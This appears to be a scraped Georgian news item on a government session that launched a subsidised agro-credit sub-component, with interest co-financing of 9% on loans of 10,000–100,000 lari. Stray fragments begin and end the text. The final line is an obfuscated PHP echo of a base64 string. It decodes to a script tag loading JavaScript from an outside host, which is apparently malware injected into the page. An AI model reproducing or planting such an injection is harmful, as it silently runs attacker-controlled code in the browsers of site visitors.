celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის ხელმძღვანელობით, მთავრობის ადმინისტრაციაში გამართულ მთავრობის დღევანდელ სხდომაზე მინისტრთა კაბინეტის წევრებმა რვა საკითხი განიხილეს.

საქართველოს მთავრობის ინფორმაციით, განსახილველ საკითხთა შორის იყო საქართველოს მთავრობის განკარგულების პროექტი „შეღავათიანი აგროკრედიტის პროექტისა და გადამამუშავებელი და შემნახველი საწარმოების თანადაფინანსების პროექტის დამტკიცების შესახებ“ საქართველოს მთავრობის განკარგულებაში ცვლილების თაობაზე.

მათივე ცნობით, მთავრობის სხდომაზე მიღებული გადაწყვეტილებით, „შეღავათიანი აგროკრედიტის“ პროექტის ფარგლებში ამოქმედდა ქვეკომპონენტი, რომლითაც ერთწლოვანი კულტურების მოყვანის მიმდინარე ხარჯების დაფინანსების მიზნობრიობით გაცემული სესხის პროცენტის თანადაფინანსებას სოფლის განვითარების სააგენტო განახორციელებს.

„ქვეკომპონენტის ამოქმედება ხელს შეუწყობს ერთწლოვან სასოფლო-სამეურნეო კულტურებში თვითუზრუნველყოფის მაჩვენებლის ზრდას. სოფლის განვითარების სააგენტო მოახდენს ქვეკომპონენტის ფარგლებში გაცემული სესხის არა უმეტეს 12 თვის პროცენტის თანადაფინანსებას წლიური 9 პროცენტის ოდენობით, სესხის გაცემიდან არა უმეტეს 14 თვის განმავლობაში, მას შემდეგ, რაც ბენეფიციარი დაადასტურებს სესხის მიზნობრივად ხარჯვას. ერთ ბენეფიციარზე გაცემული სესხის თანხა 10,000 ლარიდან 100, 000 ლარის ჩათვლით განისაზღვრა“, – ნათქვამია საქართველოს მთავრობის ინფორმაციაში.

317
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");